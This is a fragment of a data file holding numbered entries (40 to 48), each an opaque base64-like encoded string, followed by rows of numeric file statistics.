40: "1Z1xBPMfLAL0pf7vF3TaSBjec9gnz/tB53kmYfrDQPTtpEhJCtYOxiF6E9ewx18vbKgN9SIUMTCPcVAyPT3eU0KA7OIFDv2nCzgZmSQdaZooZtSPGLyb5iecBjzMcjSBjXTEJ3d4XR+OB274JBiXBORk0aNWRlv1OtM/xl0Qkt7Ustmze00XNOc3r7rV6I+j10DUN8AjhTW1mqQYbDSy9LIzQf/rxbbduWIhEXzkLHrFVFHA9SJM5RuMIaR+z6wqpJzyfeuhYIMbrtnoRjknJH3e8rw6ttns1gIxDvnwcC+5G0s5251w8FyGjDWmcjViw7DEgD1+2HuQZ4a/SAArnN3ZCLftlZ/USQUH/yqW2nrh9kB7Cza2fRKjyH4Kzs8Bc45xDUFuYpKsfSuaYFpNuKJTGBq5jNz2mkb1HKmdnpoia+pcoD/fBodt0A3tnASuGPJ8DkA+zHsfBw/xhHYa+C6h+dYyYnvuQC4Wgpp7/5SFhDQLwQ0uQ2JO+MG2b27ApCkUExwCu0MY47MpAKochdfZoNROeM8IXMIf/XuSYK5C/oLQQChg4C2v7ojFBQJMKCaSi7AYnE+KtehVVQTkwwBRV2QkqRideMn/3toI35A2BV61/epsi2YaUZswAvh243llu3j8Zh1WsCETHqV1L0eXQ2U8CnRlCQpAJaTsSrXxw0DvrQq5gYlmLm3Q6JpQ6kq7CWNdTSOfn6ZJ7w0vCMc6XHYiMtIDJcq+oXRiqTzf5umHCoVfmlaga0Tz9eFeq62RT6zF7iY25FkB4nECPL7S9GZnKVnd3DQ7Nc/1m9rrWkCp9z9At61KCo6R3sQv1B06EozpHR1P3fvNIGTqgPXXx4cTv6dRHYpmKuwPe+XOA45iE4xp9hjMTEnwA7kIDYq1sOdAbnDUiYGnicJNQwSuOKDHUB+KJpuGYfmy2rCljM8Fh+542ZvTdb54X2wr225gIEx4VI76P4cctcszg32diSZTtxEwgwmX56XFvJUW7J6AkG9awZ4Cv2KLo58MxrFqJZOkyTzzKnlx10dOIfFSAcL0hR+ZaRdyHNZ8eFlkYGaouYdyibn4I1/VH5q0rGqFlIgAUWa0JMuZDRFBnuObH56SxDWS7P1diFMFDuhFHsvwNIevr9dy58y6Rqm9ZAawQ8evkdvcXWUFsadfeSXg9V4V0WSwaOQ8jmaTywMulaqcGW6IyVuS+hsLmzAAnQDZxDMMprL48hsOVSpJiR4tfYzr3og8fNGu+ecdZ8BtosyOM3iJEKk7r9to1JyTJ6M27e7uxeC6AZrWWCNI3mmKBqZa8luZaCdgC2HjsovZo73DX1ELpdKDBy2HuOEwP1LUIlqw5oEXebDMKfwyc6slHqM1ANFzSrmWjtfz50agSdPYAOpK/QOPrjWxkjxHJzJdUBnyKuuD2AxrjSlsj5h0MVF131ZWpsMlowlHNY/Rp4stTUbDR5c36B28bpqBEKmnoEAV6BMfgR3UpPKrALqLhhCGYC8qjnRwPEXw3cKlybNEUzYWJ7hUdNJCpLLHlLy8yKry4QuPxJxmJrcBpNcD78SjTXtHvxTyDv7zkdLdhzXAMSJhFV6gc2XdAvo4N1ZW+negb246Wad+RZEmOCbZsvI2Cxu2B6VWSffQU+v5zbZxBDFrBjNfJebZ68FVXO0Wa7S6hhGSJhNlvWCtmUBCvIgDj+xf865zXApLg",
41: "cmGMZzHof1bbheNlGw3QAVGidJAwtcbv3FLgxa7zj8JH+R+kEfnOTdlUsoQkT3BwzY6AyJPAMdZ6C4evbSsPtJZArRg98koDKhFjMQXh/g90L11UELantu4FxYp2N93c7+KQV9q0NqQ/uZiAb7jPvp5T2oFiT+X8O8GdF5BQNuAS41HDqT3QDhIyxIsEuuXZShpn/zg4Xyl+f8zUWALSq/ODvuCCSGv6H0Afvdvy4nI6tEEUKoyd/bYVYtcxCYi7YdAJGxEsIo5jL3umoacghlnP8gVCHe/GTqBf2BqXIXiB7VmE5XsQBUynj9tqLPWcIiv7WAg2j2NXCFty3UkoJzlPNjHe5y7g35HQXaTWSz9o+KVMStNhqoVWx7AiAFJxVCL2KvIGbgGVX1/xJJKqTFNvgtE2Eo58dqmNdzi4RBNmST7DbBQGTfh9ThWgkzX/j22FXtYq3iwSilIT19fpmC5tmMiaw0KMVr+TrJvc4/+UZBsBSONdBgFzdsvgyTnnvRCJfNSFHDWFbO3chQTY10h/fZO73VCxbq7KCcrMAKQrhoO3+0wzKyhRUJ4rPIDMy4Fk08rFpAaDqxXcpJiKgGzxumDkQrM0eI/+LO6rMAjL5lm3LXOPDKE/S7V7YgfD22VEbXsNRWi2H+5vcxv866C2X2TbdOW1D8MZQR0UJHZYli4moUbIh593brZSgkqcIQWCVKuaiK/D9h7vh/RgcfgIWlVIPVbsCInnetY5BJDn2vksaYcPxkCkYa1OAQUoA1mA5UQsueG5r+a2cytkGXu0m2TimHKkY8PIlWg2uO9pD04zfNIkJMFAthutxMpVyYJ8Wbk+YNsrLsRAPeRD4OBRlKYlKiRQsDMUJMM6LF395LCROUtGSS+Y46wYCni9oBlT2rdJULwgGO6641hGa5W+mWbcH4yGf6CySHbGu1F0dPTu5kVuwn4R6Buyzpa5dkg48MDR4XZBERM0bhxxm08uFPaAk3Upj++3cE8lWZ2JXwn1WlTxws/VQmEa021NfOtsU9Fjs6sMgK5G1sBjN4BBXeGLwKlJ2mCRpM8PItVyzj3Q+IIzLAzVdUw8gl8tujECrNRDfaSj4e2U9VUWU8nJv+YZw2JqveCinZ+RzAD5YcSBB+rxsGG3HolmYIR0XTGOGrz5QpVO2tc5HhefuBotiiR9V5dl1pKBMEUGvd7DMZ7/Ufk3AXZkHXp1YBaY6oMyWuFDv95NVS3xILVa6uMEeJhmo1sSvdG90N3XvP0c0cMq7SiqugGwAt0BeXDJ4XJ7aL9Tzn2Vq+ewyFiUbcuEg8KctpnbhcmTi/dd8U0o30XyESm/fNM79G22CeDd5Nob64m0s+V7bONyNbcS7uTc5GSw7nfbFPmtms8B89Qysd1ILh4xoXXYI30Z86Iqc4jyii+tq/xzhU7MpDkyMNo5KyoWd1ebTDaKmalqlkB4JwjZPL+sD9VlHU3/l7WrqDq0FlABkLKMspq50Hl5un+nLvHd+Phd7QmczNKwbLZRp6UAOyVqNbpxMXHYJfq6GB+sKQ4Tb35lzkoFhBPVUe22iFVTes9+KN4jlpafUWxe5sv+4jnbWhLkDjyTL2YpyJZ3U8j9zV9hayGY2h1vG6xARD/DEZ+s9qYS1DjsXK+x77cD9WcHUwIb+EsfJWP7LQEzEcl2R/uyZBS4Jd0sZIN0wzhpH0JufXHIxyDZh",
42: "S5ywKBdanLFPJ1hexRc0SCcAJZiFkjXlKgA/AYl1nIGLrXpD763ryN3BcedzN+SYsVaA+4uHm/40UwILDGCP3VFaaWA2MOh4tsA7/mZja6bh5psad+1VlwfYYumhiry3XvY3vm3ly81YV9QbWsXj6QZRQN9iFgslLzNcaD/VjW5yQ2kqVKvOuVwghsy72Jm+UYq81wN5bxOUlYzF2H5fgwhlgZhDiN/cZ6HudJ15cKoFWQ8TIvkdAf7IGvzC1pPUw6Ew01YsW1HHW3oU9/4O+EJ/GFAZr6zVUuHaXEqhweI13mtXKyxiNL3EmMEEBW+icfW0lIm+VeC2M5AiCz/AsdIkOD7azfYgS4bV3KZsJEJR5Q9xTrnbkNCnJGLN7bYnzauHc2nGz23fgTAM2HqDvJui4kR1tCyHL41WdZedCxXl17mkvYbLOCcM1ylvcHKfpTWAP0Lik4lySjl9i1RiVXuDlDFVf4g9nVBeebAlmf3kCXBlsXnJBE7AS++7DmNBP9qtOPz0muZhr/uSSA67ClAHCe21J4jbqygzeW2lcgBVIij+bXgQAUUvflWONrY5Gwdofy2xkM+arVblLL1wOFWznYwBn8G6kk8qWRHr1FT3djchrO4fvX+atF/Or8eiECDYKawFmrnbq8Kyi/X6t3YVWs9NqvX0X6p0CkiQ3hEp8GuwQIjfl1RH60cbATSNNPbIwAOEqm4WCAqo+DETVMiydUqL4Ro3Xw4Ky6hoc5lsqLdhphFRE/R3xQyiji7EM2nPFhvyI8AFWokr3ETs/CYD4A3vgKCBjDHD6NHu51GgqVPThjWQtwcbm3JgexcyDVqDE/h7Q4Rf5XQAOS4NUlaeyPrmwxPEuNm+Bih7tjaG8gElaioSJm1/qEaHU9yjVzW7WRYQYS0QiFXBX7hjxAVPJTniE98YUpbyJkoWtz00D4IM1bcaA2tI8x7mIRGrvm9rDr5gAA3ouwSkYNl3p8oKsEiDN36UkTiq5ax3c4XuxFzb8aJ8VS+QvnZKeqcJa0S8wJf9a0EM89T7vQ7LPOiyt4GrPbU3gbKBMHJbMis5BJP0PG+3KRL9EYDdWQIPTp+z5/57K0KWPDVLjmkzg+WUgv2cUnhuYuQiFM75KqCrfqepw9KYiAIqZAvT+GzdaAzAt+UdPpij1LLLqnGFoyoCKvwC2COjOAFSIVpQ7lWkNeEPWZNY1h7oS7bU2bF7+MvQ/JzwwpjsU5Gx8ZIpJeDVapDm/+dHJsTxgeq8zU60el9R5HY1yTHKis2AjhbmgQ0LpSC/1Nm+J4QHJr5eyUpZcYmD9YBi3VPYwZyMtm1gfYF1Y7IfjjjQP5cx7vS6qmIIPconalF9JX/jD4KwipcmnPr9i7AUPbzb7XM0O0bf9X9ZRFHXtJl9nPVW/4St6yA5RdMF4PZ6rsgKCsgb4COJK0wm+APL0IeB0Wv9lpP2EoApKzro+OzHrNM4kp74g6k4ip62dPFfCdR+fwO7bR2OYSKzWwKPItUF+rhKNBlhopG8O5a3h5OUs46HLo2m2V/d+vU/UhD56s6K+tctn9qXPgUl+K8L/QqjtZZmSz2pKrUPYbizFuMn7a4eOEOZt0zrXdgWzKfw0dHPPaNZxOiiN69NEWwTvk4RsJReAFOGjmOpQgOBdTqY80O/SKLORWdWtlXYo5hQojqM+Y4YGCTIXKFqDvdpvwZeZow0V",
43: "ql5hKTbgCtYnzT4dMP4PGj4ABan48saWA/aUxByl1uw54q9ORKJ8DspI8wGgH0aQVzqz+kAOZqRL+uS4d0UmLqgTc1fxc8LZqfBY+lU3iOfixDZaH7KNbi6R0o/3NWezktuN/eewXB4F7GljvVciWsjKU/A71CVdV4tDeG2s3sniK5yjPH52rOlr4FAGFcCWTJn5eF/pzeQLoL1NZM0x7JOp5uXj3KO3uiDf1rWuYfn34a8Y00MhNwfejRrkInHBY6BkcHXVuBphYMibhfzn3P9NOCEGNZ5AnUSczlRaKxtc9SHwm3Xq3SZiCSIai5zuhlVf80Ggu0B9ZSVcFuwiEcyfsD1yAFrUFojWHp1ebsXQwedrpja82Au8B2RX/xKVCB5mRGSH85EkgfoOzidnjDKkx01yxYajp8Q5W+VAqhU6n53Gx4LYXbktJ3jrxrEF6BzjG0DLEDsCQWKWJp5q5j94a4IOa1yul2ptuNyjJoyxVKEuVyCBStok8SZRt2iQtJv7MplKimtQ2D54JOhX/KRPTdxIgo4rTxI/ZldjbyzO2zTMkkEr+Q2+opVWhViTdUjCzio/Q7IQbU7xzVU1XQs1Yp+uA/YXJ/s1nK6v+kZ5UJbrcbBmOzU3oR9ZiUZZsB5S3M9eJDzZXQkkmYSlT75Bc4xY1byEnvOJ+maoxFP3Bt+a/njE1AFaWPY8vpqQTUX5IkmpetsC40f0gqCP9urAfQa2Q+cNcyBNbUY3wZbbX92I14Srzf26trDb4lcCGz4bsGqHT2wuT6NKZHvN0z+jNLRx3ux8icO779VddkdiZ73ZHPLZOL8bZAs5eZ5FN8m29536jV8uMOwk8QWYvcKlOhduABwGVgbJ/BxBEHgtyO2sIs7XUytH5yyRWxBbAEtMuZ+NaNUYe3PAYe3egzyLpChxRmj6ck28LYRy3UtvRNtOPjrhdrj/e8ij0cDq/S88jzDZixmWeZ9ior3IPKw8XBQm7sZUyU6xzA/0fu5GXNjnUtStfppOVy1L5AY8z0PHz6pq7TR/sNTOxkGUUa8hIpFGX0VTfksdx3jhxB/WT+Ais51wNbWN7wd26Y5qmnmgaFMx5gRRCgZfD9LxR66HB/XPgPGzCebrAQ6r+aKdEj75maeUd66eW/8R3LG8z9zKuK2TDXNbNnKGlliTnp21Iu+yqz8u3JuqtoOoTPcTyC7/N8m4VSb4rHE9ooGYOQ0H0hFUOpq6bI9AvnJfwbAv6xT6bez2/gIGnhp4xj/Ls+plPkYJQNN/3kQ3E4qRTkJ+XANTfaAnggIyNwefGtdFw7NPTbXm61W3D3gjNbXm6GREQV89HKbuIO2VCRnHtS3XlXg3Mo03nSCRpzoFy1SjPvi+/pza7GgXapjmTeLt9T87vpAxUsqQy359XxB2j7+TXoUaz3pVvc3HrJlf8e9RTU+x6/l/L9RMt522xXQEgLRGpby9utKnatteO1h6hexiCk4JxQMNmrSy0nwNZIXVFaWn8C0pmaJ/C3dvt378lLfiiBLrd2Lkja4j3Crp+Y426CSUIjuTfAOzgU2fz+CxtVuc2erkw2DApO8Al+Kesnv0IRBLwVgljupPlmE+Uj2rSjtitMoC/P4DcEqd76ignukK4qqE8jl0rnBb0hr86iNLfTfkXqXSfmeCv3c8lzHD+TVrsktn7xlKxJP+gcuJim76MyooKas0mreTk",
44: "0aGubiMSm4NwvVSy/h654kI2IrI/ZeODxzEUYYWk+0s3al3IY0UFwrWcH39uAbqzeDr//L1LCbylnszVcKbfEseBXLXDGLNH+bCZz8O7TgqcfRNPCVFbCFZDSQ2uR41+WpoBHJ6pi8aQ4qbO66eVbWF4E0vu94x3tTPm27+ZaQCbVPy899nPGx1EQkP6DJf6x3vlSRxcywQhyI4G5+wcKEoAYBNf7aAvCkd/z5lvTM39jyuiIgyiO3H1RCZFxzo1sZmgD77ZYrWXNHIGsAKtTpsFIUnEBOS0ATzmpFWTNscS5YQ78TARhKiI6yot8tE/hbrT836nb0noqD5OcSVdzUvAqf6YjNO4FwFt2Ad8g9NLbb6wV7RO/pwHeQ6n/+uAXQpL+7g0jFBUrZWNygNzzyMewOF3LME6BB3KlNI7sfelFdLFPYdCs8czzgEg49YPPghTT30R889NPQjuvMKqyUM3MJo7YSKqdKGCaf17PhUNfOmjqeO2HnWaHggfJhVO0l4qxeoyGbYSn21ZJPMDqBQ5ulU0i1Ez7RN8H/jzhGsrsj1ZzCpMCOc+XG/Cm4X7e/s2fll3W7pSgWBHCb//9V5+HHriLLTcAiKxZrMT80zj5zkVWgsFNctL+691QmFc0effGejTZ4XXN70YQxUARi2uQmgucAny19XoxZrsOdo+A185a0F17uOjwFmaEObbK4xwB01t4NqrzxViFLQxTVbHFo/0HIzt/qUdRDJ6PHFB/STz7pNxdm1vBGYrqiL6g2r8VhLOajhfsP6g/ZX6BZAMVXFbBigiVqQTWQk42yzEA4tTq3XnzUNTMAN5GVRuVLXDOknb9NEQCDG4jWKrZ3ug40CteiLWTJdd63k/qgKUZmeudy227CmN1rzgvLCadJ3gnrzqils+rZyY/L2kJqYHIZ6VBJJA0UCYgs7+U2WijCoemiwu9kiluAixLKb47XgqVWPAZuHdeSENlwry+huxo6aJvoNszEB9r1obZKzoSIxuDEn9oP8GjmxPFlG+38+hW2dDGFh7yuVIPY4biKN9ylDKfDvWVTkRkmgLqE5mvbrWBo1yl/lgZ7VwHTrxhODUl7kDiyGGzHdzLMAhRqV4EC6U7/VClrodtjzZAu51CHyRnD3L66mvvwNLG+PoMx8K6UMNs+yY188MNiJmXqYSyVv9Wwu8FIYtNFBJ5hzwEsCIhVJGsQTNhXshILyh+tGNj2IpYLynl8DaKnP7kuv+0TODRxhLT/w2VLDssowLaz2ZzlOLcmAbhMmMYCfm0ZVHamtR3Yq51bmTha/Rd7YA75KBTjYmfcn2fzE0WFW9bv7RsKA8denrS84HOeO4DSkNo6KzgXVhS2tirLRBoaNcrHEWwb96ohj1qN7iByw1sl7JPie0g1vMNmz65CnNb8Q81LdwA+Ek3GbuVL9SNIpVjjyTqP1UA9WX0n+FgbsXFjPpX0avvxoQBguFt+daDM79yNUavJWJ2g8Sl+E/sCDGMcHUXeCsYJYXI+7ygriONf+wP8vrU6K4Jui8eJtGGRBzNKqi2ZnE3Q10h02WkE4jpGcY57pAJCDt/8PBi/+qMXnzIdzjpgIFYjlXziE+0EWWMPN72N/xExH3IM25mdCMdtU88Zcu70OALU4T8RFnnn+zqec0TCGpzkk75vY7aaF/Lp2tbhxrQmNn8ye4kufJv1Xdz2ZGwOhWCDDnC",
45: "LKNonYLFqjtdN/FuTNf+AnY/W4MM4Hm2hlAPTtrle4gFcz/Mk4Jqm1McASaSHaefK7Mat5yRdgUyw6P18daxP4rTZgy8Fj/yPjeTytbj4JKoODWIof9bg/5T2ZB9leXBLxO7H7ROFQMW7OQHNPhMUk98XRyX1agPicxBFR7qVK24szS6hDkJ3YSVmKT8dvzC0odHxCZ0gBlITw+r4iQvY6wt+aF++aOORckq1ET/7a3X366PDKVrh9XfftNlPy2r7KBDeyAzQL5LDRNRwKt35cKJ0VpLRq9IsKYhKtRo8PrPKm1Q5oHouNUMy8imb/mp8zYqaw82QcYO79fxho8JjZmHso6Pxm6aWQlc8R7lwz2/jvadRa5/egJ15OhNkb+q/0CGNfifrLtUzm5+z9hXeWP5v/zsZKB36LdlkB5PJpZ5zWuPCw0cK2vJBfDfeKtWdQ+my4kTY/8ZBL1Z18YMzdmAUhVjtt1uQfP0j3TumTp0EpItDjeLbj2YqBewUjU05i40BKnDMs10a1rxEkxlNlOcWlQF9ItfQ3mHuj7dTllkE8xHj0pTYGT4Le376cV2dOt7iG/bKtmz7mbpgpxHdVMwHcA15kjvuwt8H+hQewBo8bmTvBovf9JloKkpBqIEuIgNV3hdo6oZQi4+Q0pITRBPPnl9XeCs+GL6psyY19wSq5LCE+y+Wsgw9U44/icAZUo9Nownmg8DzJICYay/XZkSzmB93+g3aU9pjBut2Sl32v2An2GkCo7zyW+c5wmnymWGa+kueB7dzFjoONQDoVJlQ8Tl5tJXN03z5qhReoKSS9atv+dykSg0bfTmdRJXTIVD4+fB43p1NzmTOHhHiACsZ3rT8spRTxm2YLLUyZqckLlR5dsRdEsLBZXMHfaf31VYfUpXjjrN0SBMOonyF5wJRXixFt6yoDBuEG6aPumgUEW8OLIDI6VyNyCK3cHcfRc2Z+uWcfQoUFLk2jK4TrIBePLT8McCE8LPdQoG9m931gW39JAf5R42wMn51JUvgaxJv58+9giUl8Y3SmVeP1DGgWIH/iSL7vmLT3qJJifOmBJNPgAx2EINeoO/l6oVMMLMXH3EFreArIBITJMWM/giCKkP3vP/CmQD/Nc4uQjALiOG3wsXdsTtwcf8antNQiooc6snN4muVBpqSb3e+ISnhXTnzoM3aHamBP80TZgXB60eG41cvDOrz9yfbcE/RjBzvd9HcUINlUP9g+yEwy9AK1X1U14+CDotpoRITFbl5rkhkzUgDcMQ2tMDdK/vjouPomSpw58aPz+UTJjdTRxoHLj+bx6WJL5Cco36AmKe8FEnszRL/Vevva5ovW7dbWktK1kjf11AJg8zk06l9FlZIZZVb9wK+Q2+EbtwiOxdoKyrWSyA6dkOADJEZyhLC/b43Vb+3VLp3FpdrIdobC1GRKrQHAInLW9Jk31lXeGNskaboVu21JUeEgGvBrpqZESwR4RGvYLZ+y4pMEXuzsvVRceBkt0nbIqSsFBNMMbSPWMezY+jo9tHaXX+nuAcXt/jOE1jVBT3fri6i7lA4GXa4X1styx69y/upchR7WhmakqXY/Tk5J0ZyA7s72P+hOScaq4oS6a5R2QdYT2WpWr/sDwBJdM5VzFCg69AREfUh5+Ut2OjtUKcQVQ4EXpA0j6t+LLOnGSQSiKi5B3pvgrQTGU+7TtZDGeFd9+zo",
46: "FSPyZQ0h/xlO6rKrai2UZYTPjBgGZkQcRUh9U3wl33ikh8LQ/Bv73KVg4tT0WpATY+xF1yNmwGbjJGF24JAYneAunQ4gdIBrytI52yPA8Sepmxe5ZwzxdomtiON36R4TigMNCwp0O/rsbkPRi12Lhcbvw76cKNg+lXwQLEKMw0PuUpbqdQJx5P4R3f49PgYyGKk2TvW0mgkQj33GnOOQvwchybpC+i6KC/TfMEDUtmSn937/B4NgzT8iOr7FCwtpQlzz5SmcMcFpavTLTGUkakUI0Xxko8owMIj3deXk3WMXVXlK4ULh/xJrtysbmT4/SxX7zYfxMzCvFeJm4+lJIB3N2kfvWukc7pMMAla7Bgnk94c054ZDx2Ix2kPx3Sw5rwioTJtn40X7LysWY74k/31i49y3iX3FXUl7Vp3BCFvdAZpk45PY5MGGEVJzZN/TC3uyTHg9AoY8pwJjNr9pCPMmq3zv8GN2oiI6oBvM+0EkHaKVs7a/zOlWQBLHI78yOttqdxBEb1wRPemvsx1YMoyB0KxvLgkM/Hoz9W5BG0eKE9M4Y32xMoIg8B+6aiD45G0YR24dly3cRpe6skWrRUY6U845nA9Hse8ny6Mip6Qq8WWLcXwHJZ2WmH1PGMN3sblOt96+CzZQs3ph+rkrRejnJKtB7CHrVnQujPsnmqZyqBvIYd4Zk/T/x08O0k9k/BuZKCDRe7y5hxQ/h14x4AT5/4ZV5BFVCf11JE8pPB8qw7PLuyRGyT1RHRnbpFbwL530KJdkSG7+1kDNo17X/XTDywFJws2qijKYmjXyuTsP2TQd+9PFOVhl9ds/sMchjjHYNDSv45YifJ0i5xTYZkDP6tulTyVbnsEMcEAoqN5FMaLVHfzRcEFIY8O8GEmAohDhFaexeH57eSOcd+nUaoF/QF7ZsnlQmqTr6gs5Yvz+Hr1r+1yOdD1OULEcJjNKWuwfurKMhYMdlPvxzrd0qZAmUm47cYAf/JnMCmsHQWNb3HGHR1L+X6zb1CzmXXQy4HaQd5mN08dVd/tx8RU7tEco4yTrzKM5LkIjC4xwqwK81esKIo3R867CfAsv0rpDFQ3BiYLJ3e8woRBE6hBs4mQW/WdipqljhU9e+bWFbYpGxXzhqxQJp326P+YdOpErJTwvsDIgmgaRDdmFx49unQzF0K4I8TlYnlzQIXwCm8ASTwPpRtrkdlm9GqGO1WIgIH5dXgf6YeL7ac7lC18J0lmyLo3sNmvOokEqXA294DIz972oFBSpOFh4ibxmDnWEgta8tL8sctEU71wtgcJmXwtj7np2eou/kANkQeqkh4lJWKSFfpJCZs5o0zgrf6R5lrihSJWTBu5/Cp9ZisziqipYGGDJfXdEPicOBi1Bex2YaixYQ7k0RkftGFC8XwNftXVIY/RpwN6L7e5tBBLy94b8oRV3OrT6fmlHKrIcuBKU+2j1B7I43hTjqJmz1av6E1IhzL91PTJD4gBr08T+JLRkFEh8eOLgSqYqbxt65MDg35d/x+sRsOcKKwZ9nBH94XwierZsLKu9iHjv9xoSh0jQKzbIY0U+9T9Bsx9d1UW3oiVLY11RujuNjyelY84E8hAIhZLiNz5zBZFLMhhov+tZscOycbky4i0MD+NoVXeIYfHxuBtMv/5KqRDhwpvMAHFyjcEFpA8P/GVYxra7IlEIwhN2kDrJjUq6712ZR",
47: "08NR2vpOTnQ7MQkmmoH6AH6w4ozuYm9gw0Pw4J+629DbBwUqpIfbz+iKWA5uGyawDZVqBNo5WiZXKEvF6bDyE8pNfuFXKu/x9QgQSXNpka4BXA7HVs2wLhpD9524PE+GeDxaziL25eJWTk8S5/7E9peJSNyGoKodmnY7WAkE5Zr41mhJXInIFd2uc1/bkzxLGGhjgKlzH+2xmyHMV4BTmqzjhbmmKpm1GSnlmSP9UjmGeOuGbwhbd+B/x9UMQ+gY2uRh+1QasXTodqFF7K499WcsBGN80ioP7gI+KCejV8ahubAUp/pvlP/i3vPzBMg38UfCInCgcp7/P+iJQTSwcLTlRLGoSd4eRVgvVAwrEqKMgMS4lFK3hzWLEaLFi/dJkUJvYlzWbb1x7V1W0gbLEGZb/Lrc924kVGooWpsbb8/ABX7rFm0QVBWpvpRJsLe5lrzPx6Cu9qr5nTPLO/2X2vDGg16wo0I3P8wH4N/H+cTEjBJ/CD0MWIt1yINwwWPYt8Uu+1FFmIOoumhF96NI+SJIoNOr/YsJgIxpPjGbwFq8O7Ji4CaN5pH++gEoITHKdM1UcyJO54bHVqMwxNWzS3D4ccPY9jAhi0xSV/nxmQnWN2wdkGYCnwe0xN45BwvEj9L0CP4qhpO2aUZPStsqnQCT/Fw0HsVnmKlyPqeV+iZbeYMalhVw6Kzw/qc5mZsv52BYi6fibO1PplyfoWkqRCZ929kLWppRy7s0VCDEAeDR4tTPxdSkemL9an5e/vMc15S+B3J8hVBEyWIUk9LHWnwLfZ5KeqHOlnsaQ8P4W23V9Kqv+zc9BeEsxcvS7V91mjKf/Klt3kZiwxSnDbKOg79u9Sh4f6a68epb6HX3z4qHpXoTELe2lU59pshR8pcPWBqJYFq3/+e8qF0gSYjszEP7G6xCGo5oxRX6OK4vR/68LpIctIxstD/q8apM+oAQ4dO0LnXYX+r6BF5pa7Ljw0ZVKzdpTX3z9sWxWe6U+4zxhw91Fi66y2MfZ8CvQaM06ycAdxLlBl7P3cWFEhat7mv5ml5PQgKCOk9TF+ii6lrSBx3w9B3afC3jh+sJad18Vpt8H5ZzbqTbDtAZgaYShutFGQFmKZ5crL3yrsuuPUvZVrt1bcvbaCOBy6ESwdAOUtlOU3yUrEpnCWZdNWt6M2ZP4690Yyt4sOBIN+uaazxEWqhOlyuMxp9kPCuLqZeWw9MhDM4o71NrgKxI83Bmbp2T8La09bL3XM3kCTef0GkjsRTjrOBgXafl6TzpTDgwwkVNKqoBO1xkeasLl8UM/YtjsG2Rm3/95++g44zR4buH8a4kcYA2rZdWm0/v6CPDCCbJDk8oUavBkZb41arWIaeZUxikeBSUNQBOgBfcgOhMv960nCitRVMp/27O2Gj6tx6NETj1v/ue8OgMVIpqMmEKpcxdTFph5riZ802p27kMjndAdyIW0wNhFQbkElgTNozG2GojatkR23Iyuxa6QGWKhmSs4zzl7c/Em/ZAIY9j10ie72Wnh/wzne/RQ4Jy3hVa3/wC14RFCW9MxHLB8/AEqfRyuBOTBIeyaqMZFJpn9rKm0lKQkiTYVpQi6hzWJ6oWeGlyKkbSBhYRs8QdwwZ39TzpdjCsEcYmq/dK0GafzDXm2EqpO//Uf1HfhjQ4DxkXcDA5kjzFlgjUTsuKgg4znPfBwV3o78f7hlDE0",
48: "PsMERKhYs1H1ohYM5apKzL0001/Vka4wwV5KQdIyA9KKqpKgHXN7THgr0WCBabHpl3Hs26N22NhTXdjiG8X6VwgLq9cHnga+TRna0OcBgk49yhPKURVxk01TJdyjGkeuGNf09675IBlN+xNeE2wJnGyeYz8NfngKupBsuOZU8GixvxSMY99QIdTaNFDg4LpB0cnvqbg9DaXxmEH6wOwYljuIGnJ2gOo+YSjV6uVn+DpBW+rxjiG3Y3dzQXFfk883G+vEKM+vjxFDVMEljP31fi6AeIU488/I7ZbsCW6vLnBtJHOa4eiwbu6aEvgGQHmGSmFpkx7hC79iDKiBMUoAL2A4pvN6/7rEwld4z4Xz94ajjiFPN/PwI21GiiZah5M3Rvn4Q8aj4pGd+VE45L/F4uRHoBwl/XCxGvrfOxBQixbUU8MGOWNDYmEYby/zAd7YJYmqGPsvhgWEchAnEgj+MZ32KxNL4lJLoCuIbws004N/fG+zJwctzf2XmSrCjkrk398z1W27tvGbV6AqrgS4hM/eaAbBxqz/0N4Uvxwcf7LWljv9w9a0AF0otocBiNXOlxtjPUo/j9MOxe/Ir0Ok2CU0xYPFEhY4LXLb7+vMx8hzBjC8Vqlfplr/JrgvFMkHRZv8GJ3BguGeqKy7ILbJmkrwLexSvMSF+Ujtqa2tOu3h6OYYfptjIlkghc51t4RtxLRlTArF2jYGI6xfK6DJ9xj03ukuvgQKcfDUjsHw5Iz1FL13Yry37Cu5R5OuAvjNZ1OlOa5gbnAvqN3btH0EilsazNqyd7kSQM/3ntNLZwe55dcJ0DmWAeLTo861Jff9kaFPuOTFv1kNWuOgHijb5BkHYbrCOCAW/WXLrEBXFHLEdRlIVGYjQoGvDntW1Fvkt9oW37pIDroa/sLrGFIpcJwsZwtExD306MZRSRce1/f6eMFARCd+MPPKrLVltTPVcDK8JlDMDUq3TwrhoxBxTqITaUOe3SFqOmR247DDKkGjtNEm53k+mPAeXhOHEJdT0ildxIL7/ZW5q5tdyhivZYauVvCnjr1olSq20WMEBoJzhXHYITBWbWUBRrKOUqD+sqJ3KksDVZmB2SI7Ft4XZzlt5xDHH0IkfCzQqg36Ll+eg04L2B3OcdjcnIWGIxtr+N1NlbviHi94STcwRuvkfSWsUbU+vZF1pNqv9yYdYaEAIbM6rt/j0h6k713/tUS+NPVDhdx+aDrC54gXRiNCPqXjf9YS0ZP5jzFrwAXOA8aOb8xI938+fooEiJd5gQ0jcu3OnMJssN9d6oTB4rnpp2lmVsWSoBHSiB0gsLAOw1KHlp9i2Si+9zg8b/T5vL7xSlhIhhvKG4gjEF1CifsF2H2Z9CODj+/VSLZHSTJOxk/rnJLX5FbgH0/BdnXgcLoL6S/ogja4wf8xe4kF7nSxAm/H8wx3GoWHHpo0A0S3fYdEsQVHSGc1dRt0bo46V00pO/ApKtNGPPnKH1oUeiJNX5HN57E1YtUnCYyLcCsZ4PO0PNZ85UZR2LjS0i80LHerXqcmtpvWbyHoH6uyTKdqYNoRmPhTcGpnNxE5y6dCxRfO8YLbC6jY0u41mpLuBVK5P0kgmIGnmGLjp2bUByngA1g33lh+FsSStlFn0mJZ919fcKIDALtHTkR2n+n3VX3q9JNnLcBRByz2Hy7+/QQ0UFPh5q5EsEvWF3gvIPjf1",
}
| 1,554.8125
| 1,714
| 0.964586
| 1,541
| 49,754
| 31.142764
| 0.991564
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.161522
| 0.002412
| 49,754
| 31
| 1,715
| 1,604.967742
| 0.805375
| 0
| 0
| 0
| 0
| 0.935484
| 0.993789
| 0.993789
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
